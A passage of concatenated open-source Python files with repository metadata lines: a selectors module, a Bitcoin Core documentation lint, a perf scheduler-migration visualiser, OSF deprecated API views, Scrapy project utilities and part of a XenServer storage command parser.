key = super(SelectSelector, self).unregister(fileobj)
self._readers.discard(key.fd)
self._writers.discard(key.fd)
return key
def _select(self, r, w, timeout=None):
""" Wrapper for select.select because timeout is a positional arg """
return select.select(r, w, [], timeout)
def select(self, timeout=None):
# Selecting on empty lists on Windows errors out.
if not len(self._readers) and not len(self._writers):
return []
timeout = None if timeout is None else max(timeout, 0.0)
ready = []
r, w, _ = _syscall_wrapper(self._select, True, self._readers,
self._writers, timeout)
r = set(r)
w = set(w)
for fd in r | w:
events = 0
if fd in r:
events |= EVENT_READ
if fd in w:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
if hasattr(select, "poll"):
class PollSelector(BaseSelector):
""" Poll-based selector """
def __init__(self):
super(PollSelector, self).__init__()
self._poll = select.poll()
def register(self, fileobj, events, data=None):
key = super(PollSelector, self).register(fileobj, events, data)
event_mask = 0
if events & EVENT_READ:
event_mask |= select.POLLIN
if events & EVENT_WRITE:
event_mask |= select.POLLOUT
self._poll.register(key.fd, event_mask)
return key
def unregister(self, fileobj):
key = super(PollSelector, self).unregister(fileobj)
self._poll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.poll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._poll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
if hasattr(select, "epoll"):
class EpollSelector(BaseSelector):
""" Epoll-based selector """
def __init__(self):
super(EpollSelector, self).__init__()
self._epoll = select.epoll()
def fileno(self):
return self._epoll.fileno()
def register(self, fileobj, events, data=None):
key = super(EpollSelector, self).register(fileobj, events, data)
events_mask = 0
if events & EVENT_READ:
events_mask |= select.EPOLLIN
if events & EVENT_WRITE:
events_mask |= select.EPOLLOUT
_syscall_wrapper(self._epoll.register, False, key.fd, events_mask)
return key
def unregister(self, fileobj):
key = super(EpollSelector, self).unregister(fileobj)
try:
_syscall_wrapper(self._epoll.unregister, False, key.fd)
except SelectorError:
# This can occur when the fd was closed since registry.
pass
return key
def select(self, timeout=None):
if timeout is not None:
if timeout <= 0:
timeout = 0.0
else:
# select.epoll.poll() has a resolution of 1 millisecond
# but luckily takes seconds so we don't need a wrapper
# like PollSelector. Just for better rounding.
timeout = math.ceil(timeout * 1e3) * 1e-3
timeout = float(timeout)
else:
timeout = -1.0 # epoll.poll() must have a float.
# We always want at least 1 to ensure that select can be called
# with no file descriptors registered. Otherwise will fail.
max_events = max(len(self._fd_to_key), 1)
ready = []
fd_events = _syscall_wrapper(self._epoll.poll, True,
timeout=timeout,
maxevents=max_events)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.EPOLLIN:
events |= EVENT_WRITE
if event_mask & ~select.EPOLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._epoll.close()
super(EpollSelector, self).close()
if hasattr(select, "kqueue"):
class KqueueSelector(BaseSelector):
""" Kqueue / Kevent-based selector """
def __init__(self):
super(KqueueSelector, self).__init__()
self._kqueue = select.kqueue()
def fileno(self):
return self._kqueue.fileno()
def register(self, fileobj, events, data=None):
key = super(KqueueSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
if events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
return key
def unregister(self, fileobj):
key = super(KqueueSelector, self).unregister(fileobj)
if key.events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
if key.events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
return key
def select(self, timeout=None):
if timeout is not None:
timeout = max(timeout, 0)
max_events = len(self._fd_to_key) * 2
ready_fds = {}
kevent_list = _syscall_wrapper(self._kqueue.control, True,
None, max_events, timeout)
for kevent in kevent_list:
fd = kevent.ident
event_mask = kevent.filter
events = 0
if event_mask == select.KQ_FILTER_READ:
events |= EVENT_READ
if event_mask == select.KQ_FILTER_WRITE:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
if key.fd not in ready_fds:
ready_fds[key.fd] = (key, events & key.events)
else:
old_events = ready_fds[key.fd][1]
ready_fds[key.fd] = (key, (events | old_events) & key.events)
return list(ready_fds.values())
def close(self):
self._kqueue.close()
super(KqueueSelector, self).close()
if not hasattr(select, 'select'): # Platform-specific: AppEngine
HAS_SELECT = False
def _can_allocate(struct):
""" Checks that select structs can be allocated by the underlying
operating system, not just advertised by the select module. We don't
check select() because we'll be hopeful that most platforms that
don't have it available will not advertise it. (ie: GAE) """
try:
# select.poll() objects won't fail until used.
if struct == 'poll':
p = select.poll()
p.poll(0)
# All others will fail on allocation.
else:
getattr(select, struct)().close()
return True
except (OSError, AttributeError) as e:
return False
# Choose the best implementation, roughly:
# kqueue == epoll > poll > select. Devpoll not supported. (See above)
# select() also can't accept a FD > FD_SETSIZE (usually around 1024)
def DefaultSelector():
""" This function serves as a first call for DefaultSelector to
detect if the select module is being monkey-patched incorrectly
by eventlet, greenlet, and preserve proper behavior. """
global _DEFAULT_SELECTOR
if _DEFAULT_SELECTOR is None:
if _can_allocate('kqueue'):
_DEFAULT_SELECTOR = KqueueSelector
elif _can_allocate('epoll'):
_DEFAULT_SELECTOR = EpollSelector
elif _can_allocate('poll'):
_DEFAULT_SELECTOR = PollSelector
elif hasattr(select, 'select'):
_DEFAULT_SELECTOR = SelectSelector
else: # Platform-specific: AppEngine
raise ValueError('Platform does not have a selector')
return _DEFAULT_SELECTOR()
| mit |
Flowdalic/bitcoin | test/lint/check-doc.py | 1 | 1931 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
This checks if all command line args are documented.
Return value is 0 to indicate no error.
Author: @MarcoFalke
'''
from subprocess import check_output
import re
import sys
FOLDER_GREP = 'src'
FOLDER_TEST = 'src/test/'
REGEX_ARG = '(?:ForceSet|SoftSet|Get|Is)(?:Bool)?Args?(?:Set)?\("(-[^"]+)"'
REGEX_DOC = 'AddArg\("(-[^"=]+?)(?:=|")'
CMD_ROOT_DIR = '`git rev-parse --show-toplevel`/{}'.format(FOLDER_GREP)
CMD_GREP_ARGS = r"git grep --perl-regexp '{}' -- {} ':(exclude){}'".format(REGEX_ARG, CMD_ROOT_DIR, FOLDER_TEST)
CMD_GREP_DOCS = r"git grep --perl-regexp '{}' {}".format(REGEX_DOC, CMD_ROOT_DIR)
# list unsupported, deprecated and duplicate args as they need no documentation
SET_DOC_OPTIONAL = set(['-rpcssl', '-benchmark', '-h', '-help', '-socks', '-tor', '-debugnet', '-whitelistalwaysrelay', '-promiscuousmempoolflags', '-blockminsize', '-dbcrashratio', '-forcecompactdb', '-usehd'])
def main():
used = check_output(CMD_GREP_ARGS, shell=True, universal_newlines=True, encoding='utf8')
docd = check_output(CMD_GREP_DOCS, shell=True, universal_newlines=True, encoding='utf8')
args_used = set(re.findall(re.compile(REGEX_ARG), used))
args_docd = set(re.findall(re.compile(REGEX_DOC), docd)).union(SET_DOC_OPTIONAL)
args_need_doc = args_used.difference(args_docd)
args_unknown = args_docd.difference(args_used)
print("Args used : {}".format(len(args_used)))
print("Args documented : {}".format(len(args_docd)))
print("Args undocumented: {}".format(len(args_need_doc)))
print(args_need_doc)
print("Args unknown : {}".format(len(args_unknown)))
print(args_unknown)
sys.exit(len(args_need_doc))
if __name__ == "__main__":
main()
| mit |
skelton/amlogic_common_3050 | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
| gpl-2.0 |
Johnetordoff/osf.io | api/metaschemas/views.py | 14 | 1446 | from api.base.views import DeprecatedView
from api.schemas import views
from api.schemas.serializers import DeprecatedMetaSchemaSerializer, DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedRegistrationMetaSchemaList(DeprecatedView, views.RegistrationSchemaList):
max_version = '2.8'
view_category = 'registration-metaschemas'
view_name = 'registration-schema-detail'
serializer_class = DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedRegistrationMetaSchemaDetail(DeprecatedView, views.RegistrationSchemaDetail):
max_version = '2.8'
view_category = 'registration-metaschemas'
view_name = 'registration-schema-detail'
serializer_class = DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedMetaSchemasList(DeprecatedView, views.RegistrationSchemaList):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/metaschemas_list).
"""
max_version = '2.7'
view_category = 'metaschemas'
view_name = 'metaschema-list'
serializer_class = DeprecatedMetaSchemaSerializer
class DeprecatedMetaSchemaDetail(DeprecatedView, views.RegistrationSchemaDetail):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/metaschemas_read).
"""
max_version = '2.7'
view_category = 'metaschemas'
view_name = 'metaschema-detail'
serializer_class = DeprecatedMetaSchemaSerializer
| apache-2.0 |
kalessin/scrapy | scrapy/utils/project.py | 142 | 2491 | import os
from six.moves import cPickle as pickle
import warnings
from importlib import import_module
from os.path import join, dirname, abspath, isabs, exists
from scrapy.utils.conf import closest_scrapy_cfg, get_config, init_env
from scrapy.settings import Settings
from scrapy.exceptions import NotConfigured
ENVVAR = 'SCRAPY_SETTINGS_MODULE'
DATADIR_CFG_SECTION = 'datadir'
def inside_project():
scrapy_module = os.environ.get('SCRAPY_SETTINGS_MODULE')
if scrapy_module is not None:
try:
import_module(scrapy_module)
except ImportError as exc:
warnings.warn("Cannot import scrapy settings module %s: %s" % (scrapy_module, exc))
else:
return True
return bool(closest_scrapy_cfg())
def project_data_dir(project='default'):
"""Return the current project data dir, creating it if it doesn't exist"""
if not inside_project():
raise NotConfigured("Not inside a project")
cfg = get_config()
if cfg.has_option(DATADIR_CFG_SECTION, project):
d = cfg.get(DATADIR_CFG_SECTION, project)
else:
scrapy_cfg = closest_scrapy_cfg()
if not scrapy_cfg:
raise NotConfigured("Unable to find scrapy.cfg file to infer project data dir")
d = abspath(join(dirname(scrapy_cfg), '.scrapy'))
if not exists(d):
os.makedirs(d)
return d
def data_path(path, createdir=False):
"""If path is relative, return the given path inside the project data dir,
otherwise return the path unmodified
"""
if not isabs(path):
path = join(project_data_dir(), path)
if createdir and not exists(path):
os.makedirs(path)
return path
def get_project_settings():
if ENVVAR not in os.environ:
project = os.environ.get('SCRAPY_PROJECT', 'default')
init_env(project)
settings = Settings()
settings_module_path = os.environ.get(ENVVAR)
if settings_module_path:
settings.setmodule(settings_module_path, priority='project')
# XXX: remove this hack
pickled_settings = os.environ.get("SCRAPY_PICKLED_SETTINGS_TO_OVERRIDE")
if pickled_settings:
settings.setdict(pickle.loads(pickled_settings), priority='project')
# XXX: deprecate and remove this functionality
env_overrides = {k[7:]: v for k, v in os.environ.items() if
k.startswith('SCRAPY_')}
if env_overrides:
settings.setdict(env_overrides, priority='project')
return settings
| bsd-3-clause |
robertbreker/sm | drivers/SRCommand.py | 6 | 14472 | #!/usr/bin/python
#
# Copyright (C) Citrix Systems Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; version 2.1 only.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# SRCommand: parse SR command-line objects
#
import XenAPI
import sys, errno, syslog
import xs_errors
import xmlrpclib
import SR, VDI, util
import blktap2
import resetvdis
import os
import copy
NEEDS_VDI_OBJECT = [
"vdi_update", "vdi_create", "vdi_delete", "vdi_snapshot", "vdi_clone",
"vdi_resize", "vdi_resize_online", "vdi_attach", "vdi_detach",
"vdi_activate", "vdi_deactivate", "vdi_attach_from_config",
"vdi_generate_config", "vdi_compose",
"vdi_epoch_begin", "vdi_epoch_end" ]
# don't log the commands that spam the log file too much
NO_LOGGING = {
"iso": ["sr_scan"],
"nfs_iso": ["sr_scan"]
}
EXCEPTION_TYPE = {
"sr_scan" : "SRScan",
"vdi_init" : "VDILoad",
"vdi_create" : "VDICreate",
"vdi_delete" : "VDIDelete",
"vdi_attach" : "VDIUnavailable",
"vdi_detach" : "VDIUnavailable",
"vdi_activate" : "VDIUnavailable",
"vdi_deactivate" : "VDIUnavailable",
"vdi_resize" : "VDIResize",
"vdi_resize_online" : "VDIResize",
"vdi_snapshot" : "VDISnapshot",
"vdi_clone" : "VDIClone",
}
class SRCommand:
def __init__(self, driver_info):
self.dconf = ''
self.type = ''
self.sr_uuid = ''
self.cmdname = ''
self.cmdtype = ''
self.cmd = None
self.args = None
self.driver_info = driver_info
def parse(self):
if len(sys.argv) <> 2:
util.SMlog("Failed to parse commandline; wrong number of arguments; argv = %s" % (repr(sys.argv)))
raise xs_errors.XenError('BadRequest')
# Debug logging of the actual incoming command from the caller.
# util.SMlog( "" )
# util.SMlog( "SM.parse: DEBUG: args = %s,\n%s" % \
# ( sys.argv[0], \
# util.splitXmlText( util.hideMemberValuesInXmlParams( \
# sys.argv[1] ), showContd=True ) ), \
# priority=syslog.LOG_DEBUG )
try:
params, methodname = xmlrpclib.loads(sys.argv[1])
self.cmd = methodname
params = params[0] # expect a single struct
self.params = params
# params is a dictionary
self.dconf = params['device_config']
if params.has_key('sr_uuid'):
self.sr_uuid = params['sr_uuid']
if params.has_key('vdi_uuid'):
self.vdi_uuid = params['vdi_uuid']
elif self.cmd == "vdi_create":
self.vdi_uuid = util.gen_uuid ()
except Exception, e:
util.SMlog("Failed to parse commandline; exception = %s argv = %s" % (str(e), repr(sys.argv)))
raise xs_errors.XenError('BadRequest')
def run_statics(self):
if self.params['command'] == 'sr_get_driver_info':
print util.sr_get_driver_info(self.driver_info)
sys.exit(0)
def run(self, sr):
try:
return self._run_locked(sr)
except (util.CommandException, util.SMException, XenAPI.Failure), e:
util.logException(self.cmd)
msg = str(e)
if isinstance(e, util.CommandException):
msg = "Command %s failed (%s): %s" % \
(e.cmd, e.reason, os.strerror(abs(e.code)))
excType = EXCEPTION_TYPE.get(self.cmd)
if not excType:
excType = "SMGeneral"
raise xs_errors.XenError(excType, opterr=msg)
except blktap2.TapdiskFailed, e:
util.logException('tapdisk failed exception: %s' % e)
raise xs_errors.XenError('TapdiskFailed',
os.strerror(e.get_error().get_error_code()))
except blktap2.TapdiskExists, e:
util.logException('tapdisk exists exception: %s' % e)
raise xs_errors.XenError('TapdiskAlreadyRunning', e.__str__())
except:
util.logException('generic exception: %s' % self.cmd)
raise
def _run_locked(self, sr):
lockSR = False
lockInitOnly = False
rv = None
e = None
if self.cmd in sr.ops_exclusive:
lockSR = True
elif self.cmd in NEEDS_VDI_OBJECT and "vdi_init" in sr.ops_exclusive:
lockInitOnly = True
target = None
acquired = False
if lockSR or lockInitOnly:
sr.lock.acquire()
acquired = True
try:
try:
if self.cmd in NEEDS_VDI_OBJECT:
target = sr.vdi(self.vdi_uuid)
finally:
if acquired and lockInitOnly:
sr.lock.release()
acquired = False
try:
rv = self._run(sr, target)
except Exception, e:
raise
finally:
if acquired:
sr.lock.release()
try:
sr.cleanup()
except Exception, e1:
msg = 'failed to clean up SR: %s' % e1
if not e:
util.SMlog(msg)
raise e1
else:
util.SMlog('WARNING: %s (error ignored)' % msg)
return rv
def _run(self, sr, target):
dconf_type = sr.dconf.get("type")
if not dconf_type or not NO_LOGGING.get(dconf_type) or \
not self.cmd in NO_LOGGING[dconf_type]:
if 'device_config' in self.params:
util.SMlog("%s %s" % (self.cmd, util.hidePasswdInParams(self.params,'device_config')))
else:
util.SMlog("%s %s" % (self.cmd, repr(self.params)))
caching_params = dict((k, self.params.get(k)) for k in \
[blktap2.VDI.CONF_KEY_ALLOW_CACHING,
blktap2.VDI.CONF_KEY_MODE_ON_BOOT,
blktap2.VDI.CONF_KEY_CACHE_SR,
blktap2.VDI.CONF_KEY_O_DIRECT])
if self.cmd == 'vdi_create':
# These are the fields owned by the backend, passed on the
# commandline:
# LVM SRs store their metadata in XML format. XML does not support
# all unicode characters, so we must check if the label or the
# description contain such characters. We must enforce this
# restriction to other SRs as well (even if they do allow these
# characters) in order to be consistent.
target.label = self.params['args'][1]
target.description = self.params['args'][2]
if not util.isLegalXMLString(target.label) \
or not util.isLegalXMLString(target.description):
raise xs_errors.XenError('IllegalXMLChar', \
opterr = 'The name and/or description you supplied contains one or more unsupported characters. The name and/or description must contain valid XML characters. See http://www.w3.org/TR/2004/REC-xml-20040204/#charsets for more information.')
target.ty = self.params['vdi_type']
target.metadata_of_pool = self.params['args'][3]
target.is_a_snapshot = self.params['args'][4] == "true"
target.snapshot_time = self.params['args'][5]
target.snapshot_of = self.params['args'][6]
target.read_only = self.params['args'][7] == "true"
return target.create(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
elif self.cmd == 'vdi_update':
# Check for invalid XML characters, similar to VDI.create right
# above.
vdi_ref = sr.session.xenapi.VDI.get_by_uuid(self.vdi_uuid)
name_label = sr.session.xenapi.VDI.get_name_label(vdi_ref)
description = sr.session.xenapi.VDI.get_name_description(vdi_ref)
if not util.isLegalXMLString(name_label) \
or not util.isLegalXMLString(description):
raise xs_errors.XenError('IllegalXMLChar', \
opterr = 'The name and/or description you supplied contains one or more unsupported characters. The name and/or description must contain valid XML characters. See http://www.w3.org/TR/2004/REC-xml-20040204/#charsets for more information.')
return target.update(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_introduce':
target = sr.vdi(self.params['new_uuid'])
return target.introduce(self.params['sr_uuid'], self.params['new_uuid'])
elif self.cmd == 'vdi_delete':
return target.delete(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_attach':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
writable = self.params['args'][0] == 'true'
return target.attach(self.params['sr_uuid'], self.vdi_uuid, writable)
elif self.cmd == 'vdi_detach':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.detach(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_snapshot':
return target.snapshot(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_clone':
return target.clone(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_resize':
return target.resize(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
